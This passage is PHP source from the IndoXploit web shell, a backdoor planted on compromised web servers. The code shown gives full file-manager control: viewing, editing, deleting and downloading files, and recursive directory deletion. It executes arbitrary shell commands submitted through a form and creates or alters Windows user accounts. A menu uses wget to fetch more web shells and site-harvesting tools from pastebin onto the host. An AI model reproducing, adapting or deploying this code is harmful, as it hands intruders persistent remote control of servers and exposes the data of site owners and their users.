2290. <input type='text' name='user' placeholder='username' value='indoxploit' required>
2291. <input type='text' name='pass' placeholder='password' value='indoxploit' required>
2292. <input type='submit' class='btn btn-success btn-sm' name='create' value='>>'>
2293. </form>
2294. -- Option --<br>
2295. <form method='post'>
2296. <input type='text' name='r_user' placeholder='username' required>
2297. <select name='opsi'>
2298. <option value='1'>Cek Username</option>
2299. <option value='2'>Ubah Password</option>
2300. <option value='3'>Hapus Username</option>
2301. </select>
2302. <input type='submit' class='btn btn-success btn-sm'name='s_opsi' value='>>'>
2303. </form>
2304. ";
2305. }
2306. } else {
2307. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
2308. }
2309. } elseif($_GET['act'] == 'newfile') {
2310. if($_POST['new_save_file']) {
2311. $newfile = htmlspecialchars($_POST['newfile']);
2312. $fopen = fopen($newfile, "a+");
2313. if($fopen) {
2314. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
2315. } else {
2316. $act = "<font color=red>permission denied</font>";
2317. }
2318. }
2319. echo $act;
2320. echo "<form method='post'>
2321. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
2322. <input type='submit' name='new_save_file' value='Submit' class='btn btn-success btn-sm'>
2323. </form>";
2324. } elseif($_GET['act'] == 'newfolder') {
2325. if($_POST['new_save_folder']) {
2326. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
2327. if(!mkdir($new_folder)) {
2328. $act = "<font color=red>permission denied</font>";
2329. } else {
2330. $act = "<script>window.location='?dir=".$dir."';</script>";
2331. }
2332. }
2333. echo $act;
2334. echo "<form method='post'>
2335. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
2336. <input type='submit' name='new_save_folder' value='Submit' class='btn btn-success btn-sm'>
2337. </form>";
2338. } elseif($_GET['act'] == 'rename_dir') {
2339. if($_POST['dir_rename']) {
2340. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
2341. if($dir_rename) {
2342. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2343. } else {
2344. $act = "<font color=red>permission denied</font>";
2345. }
2346. echo "".$act."<br>";
2347. }
2348. echo "<form method='post'>
2349. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
2350. <input type='submit' name='dir_rename' value='rename'>
2351. </form>";
2352. } elseif($_GET['act'] == 'delete_dir') {
2353. if(is_dir($dir)) {
2354. if(is_writable($dir)) {
2355. @rmdir($dir);
2356. @exe("rm -rf $dir");
2357. @exe("rmdir /s /q $dir");
2358. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
2359. } else {
2360. $act = "<font color=red>could not remove ".basename($dir)."</font>";
2361. }
2362. }
2363. echo $act;
2364. } elseif($_GET['act'] == 'view') {
2365. echo "Filename: [ <font color=#18BC9C>".basename($_GET['file'])."</font> ] [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2366. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
2367. } elseif($_GET['act'] == 'edit') {
2368. if($_POST['save']) {
2369. $save = file_put_contents($_GET['file'], $_POST['src']);
2370. if($save) {
2371. $act = "<font color=#18BC9C>Saved!</font>";
2372. } else {
2373. $act = "<font color=red>permission denied</font>";
2374. }
2375. echo "".$act."<br>";
2376. }
2377. echo "Filename: [ <font color=#18BC9C>".basename($_GET['file'])."</font> ] [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
2378. echo "<form method='post'>
2379. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
2380. <input type='submit' class='btn btn-success btn-sm' value='Save' name='save' style='width: 500px;'>
2381. </form>";
2382. } elseif($_GET['act'] == 'rename') {
2383. if($_POST['do_rename']) {
2384. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
2385. if($rename) {
2386. $act = "<script>window.location='?dir=".$dir."';</script>";
2387. } else {
2388. $act = "<font color=red>permission denied</font>";
2389. }
2390. echo "".$act."<br>";
2391. }
2392. echo "Filename: [ <font color=#18BC9C>".basename($_GET['file'])."</font> ] [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a><br>";
2393. echo "<form method='post'>
2394. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
2395. <input type='submit' class='btn btn-success btn-sm' name='do_rename' value='rename'>
2396. </form>";
2397. } elseif($_GET['act'] == 'delete') {
2398. $delete = unlink($_GET['file']);
2399. if($delete) {
2400. $act = "<script>window.location='?dir=".$dir."';</script>";
2401. } else {
2402. $act = "<font color=red>permission denied</font>";
2403. }
2404. echo $act;
2405. } else {
2406. if(is_dir($dir) === true) {
2407. if(!is_readable($dir)) {
2408. echo "<font color=red>can't open directory. ( not readable )</font>";
2409. } else {
2410. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
2411. <tr>
2412. <th class="th_home"><center>Name</center></th>
2413. <th class="th_home"><center>Type</center></th>
2414. <th class="th_home"><center>Size</center></th>
2415. <th class="th_home"><center>Last Modified</center></th>
2416. <th class="th_home"><center>Owner/Group</center></th>
2417. <th class="th_home"><center>Permission</center></th>
2418. <th class="th_home"><center>Action</center></th>
2419. </tr>';
2420. $scandir = scandir($dir);
2421. foreach($scandir as $dirx) {
2422. $dtype = filetype("$dir/$dirx");
2423. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
2424. if(function_exists('posix_getpwuid')) {
2425. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
2426. $downer = $downer['name'];
2427. } else {
2428. //$downer = $uid;
2429. $downer = fileowner("$dir/$dirx");
2430. }
2431. if(function_exists('posix_getgrgid')) {
2432. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
2433. $dgrp = $dgrp['name'];
2434. } else {
2435. $dgrp = filegroup("$dir/$dirx");
2436. }
2437. if(!is_dir("$dir/$dirx")) continue;
2438. if($dirx === '..') {
2439. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
2440. } elseif($dirx === '.') {
2441. $href = "<a href='?dir=$dir'>$dirx</a>";
2442. } else {
2443. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
2444. }
2445. if($dirx === '.' || $dirx === '..') {
2446. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
2447. } else {
2448. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
2449. }
2450. echo "<tr class='td_home'> ";
2451. echo "<td class='td_home' ><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
2452. echo "<td class='td_home'><center>$dtype</center></td>";
2453. echo "<td class='td_home'><center>-</center></td>";
2454. echo "<td class='td_home'><center>$dtime</center></td>";
2455. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
2456. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
2457. echo "<td style='padding-left: 15px;'>$act_dir</td>";
2458. echo "</tr>";
2459. }
2460. }
2461. } else {
2462. echo "<font color=red>can't open directory.</font>";
2463. }
2464. foreach($scandir as $file) {
2465. $ftype = filetype("$dir/$file");
2466. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
2467. $size = filesize("$dir/$file")/1024;
2468. $size = round($size,3);
2469. if(function_exists('posix_getpwuid')) {
2470. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
2471. $fowner = $fowner['name'];
2472. } else {
2473. //$downer = $uid;
2474. $fowner = fileowner("$dir/$file");
2475. }
2476. if(function_exists('posix_getgrgid')) {
2477. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
2478. $fgrp = $fgrp['name'];
2479. } else {
2480. $fgrp = filegroup("$dir/$file");
2481. }
2482. if($size > 1024) {
2483. $size = round($size/1024,2). 'MB';
2484. } else {
2485. $size = $size. 'KB';
2486. }
2487. if(!is_file("$dir/$file")) continue;
2488. echo "<tr class='td_home'>";
2489. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
2490. echo "<td class='td_home'><center>$ftype</center></td>";
2491. echo "<td class='td_home'><center>$size</center></td>";
2492. echo "<td class='td_home'><center>$ftime</center></td>";
2493. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
2494. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
2495. echo "<td style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
2496. echo "</tr>";
2497. }
2498. echo "</table>";
2499. if(!is_readable($dir)) {
2500. //
2501. } else {
2502. echo "<hr>";
2503. }
2504.  
2505. echo"<table align=center>";
2506. echo"<td>";
2507. echo"<center>";
2508. echo"<form action='' method='post'> ";
2509. echo"<select name='buah' style=padding:4px 10px;>";
2510. echo"<option value='wso_shell'> WSO Shell </option>";
2511. echo"<option value='galer_shell'> Galerz Shell </option>";
2512. echo"<option value='k2_shell'> K2LL3D Shell </option>";
2513. echo"<option value='r7_shell'> RES7OCK Shell </option>";
2514. echo"<option value='vhost'> Bypass Var Vhost </option>";
2515. echo"<option value='email'> Email Extractor </option>";
2516. echo"<option value='bin'> Mass Bin identifier </option>";
2517. echo"<option value='md5'> MD5 Encoder </option>";
2518. echo"<option value='base64'> Base64 Encode / Decode </option>";
2519. echo"<option value='remove'> Remove Duplicate Text </option>";
2520. echo"<option value='separator'> Separator Text </option>";
2521. echo"<option value='sufpre'> Add Sufix / Prefix Text </option>";
2522. echo"<option value='joomla_extract'> Jommla Ip Extractor </option>";
2523. echo"<option value='wordpress_extract'> Wordpress Ip Extractor </option>";
2524. echo"</select> ";
2525. echo"<input type='submit' class='btn btn-success btn-sm' name='enter' value='Enter'>";
2526. echo"</form> ";
2527.  
2528. if(isset($_POST['enter'])) {
2529. if ($_POST['buah'] == 'k2_shell') {
2530. $exec=exec('wget http://pastebin.com/raw.php?i=HGVTfyA6 -O k2ll3d.php');
2531. if(file_exists('./k2ll3d.php')){
2532. echo '<center><a href=./k2ll3d.php> k2ll3d.php </a> Succes mhanx !</center>';
2533. } else {
2534. echo 'Fail ! ';
2535. }
2536.  
2537. }elseif ($_POST['buah'] == 'r7_shell') {
2538. $exec=exec('wget http://pastebin.com/raw.php?i=tXWtZzrb -O res7.php');
2539. if(file_exists('./res7.php')){
2540. echo '<center><a href=./res7.php> res7.php </a> Succes mhanx !</center>';
2541. } else {
2542. echo 'Fail ! ';
2543. }
2544.  
2545. }elseif ($_POST['buah'] == 'wso_shell') {
2546. $exec=exec('wget http://pastebin.com/raw.php?i=Tpm5E10g -O wso.php');
2547. if(file_exists('./wso.php')){
2548. echo '<center><a href=./wso.php> wso.php </a> Succes mhanx !</center>';
2549. } else {
2550. echo 'Fail ! ';
2551. }
2552.  
2553. }elseif ($_POST['buah'] == 'galer_shell') {
2554. $exec=exec('wget http://pastebin.com/raw.php?i=cXQ2iSY6 -O galerz.php');
2555. if(file_exists('./galerz.php')){
2556. echo '<center><a href=./galerz.php> galerz.php </a> Succes mhanx !</center>';
2557. } else {
2558. echo 'Fail ! ';
2559. }
2560.  
2561. }elseif ($_POST['buah'] == 'joomla_extract') {
2562. $exec=exec('wget http://pastebin.com/raw.php?i=tFG4zm9r -O joomlaip.php');
2563. if(file_exists('./joomlaip.php')){
2564. echo '<center><a href=./joomlaip.php> joomlaip.php </a> Succes mhanx !</center>';
2565. } else {
2566. echo 'Fail !';
2567. }
2568.  
2569. }elseif ($_POST['buah'] == 'wordpress_extract') {
2570. $exec=exec('wget http://pastebin.com/raw.php?i=NBUDJVCm -O wpip.php');
2571. if(file_exists('./wpip.php')){
2572. echo '<center><a href=./wpip.php> wpip.php </a> Succes mhanx !</center>';
2573. } else {
2574. echo 'Fail !';
2575. }
2576.  
2577. }elseif ($_POST['buah'] == 'md5') {
2578. $exec=exec('wget http://pastebin.com/raw.php?i=72XW4nym -O md5.php');
2579. if(file_exists('./md5.php')){
2580. echo '<center><a href=./md5.php> md5.php </a> Succes mhanx !</center>';
2581. } else {
2582. echo 'Fail !';
2583. }
2584.  
2585. }elseif ($_POST['buah'] == 'base64') {
2586. $exec=exec('wget http://pastebin.com/raw.php?i=JvbEv9es -O base64.php');
2587. if(file_exists('./base64.php')){
2588. echo '<center><a href=./base64.php> base64.php </a> Succes mhanx !</center>';
2589. } else {
2590. echo 'Fail !';
2591. }
2592.  
2593. }elseif ($_POST['buah'] == 'sufpre') {
2594. $exec=exec('wget http://pastebin.com/raw.php?i=MGrMgZ9N -O sufpre.php');
2595. if(file_exists('./sufpre.php')){
2596. echo '<center><a href=./sufpre.php> sufpre.php </a> Succes mhanx !</center>';
2597. } else {
2598. echo 'Fail !';
2599. }
2600.  
2601. }elseif ($_POST['buah'] == 'bin') {
2602. $exec=exec('wget http://pastebin.com/raw.php?i=3n1ikxsG -O bin.php');
2603. if(file_exists('./bin.php')){
2604. echo '<center><a href=./bin.php> bin.php </a> Succes mhanx !</center>';
2605. } else {
2606. echo 'Fail !';
2607. }
2608.  
2609. }elseif ($_POST['buah'] == 'remove') {
2610. $exec=exec('wget http://pastebin.com/raw.php?i=A0QVwca3 -O remove.php');
2611. if(file_exists('./remove.php')){
2612. echo '<center><a href=./remove.php> remove.php </a> Succes mhanx !</center>';
2613. } else {
2614. echo 'Fail !';
2615. }
2616. }elseif ($_POST['buah'] == 'separator') {
2617. $exec=exec('wget http://pastebin.com/raw.php?i=He6tvtKx -O separator.php');
2618. if(file_exists('./separator.php')){
2619. echo '<center><a href=./separator.php> separator.php </a> Succes mhanx !</center>';
2620. } else {
2621. echo 'Fail !';
2622. }
2623.  
2624. }elseif ($_POST['buah'] == 'vhost') {
2625. $exec=exec('wget http://pastebin.com/raw.php?i=Gkapf8bf -O vhost.php');
2626. if(file_exists('./vhost.php')){
2627. echo '<center><a href=./vhost.php> vhost.php </a> Succes mhanx !</center>';
2628. } else {
2629. echo 'Fail !';
2630. }
2631.  
2632. }elseif ($_POST['buah'] == 'email') {
2633. $exec=exec('wget http://pastebin.com/raw.php?i=KAgvMwkr -O email.php');
2634. if(file_exists('./email.php')){
2635. echo '<center><a href=./email.php> email.php </a> Succes mhanx !</center>';
2636. } else {
2637. echo 'Fail !';
2638. }
2639. }
2640. }
2641. echo"</td>";
2642. echo"<td>";
2643. echo"<a name=com>";
2644. echo "<form method='post'>";
2645. echo "<input type='text' style=padding:4px 10px; name='cmd' placeholder=command><input type='submit' name='do_cmd' value='Excute' class='btn btn-success btn-sm'>";
2646. echo "</form>";
2647. if($_POST['do_cmd']) {
2648. echo "".exe($_POST['cmd'])."";
2649. }
2650. echo"</td>";
2651. echo"</table>";
2652. echo "<center>Copyright &copy; ".date("Y")." - <a href='http://indoxploit.or.id/' target='_blank'><font color=#18BC9C>IndoXploit</font></a> Recode by :<font color='#18BC9C'> nemat0da </font></center>";
2653. }
2654. ?>
2655. </html>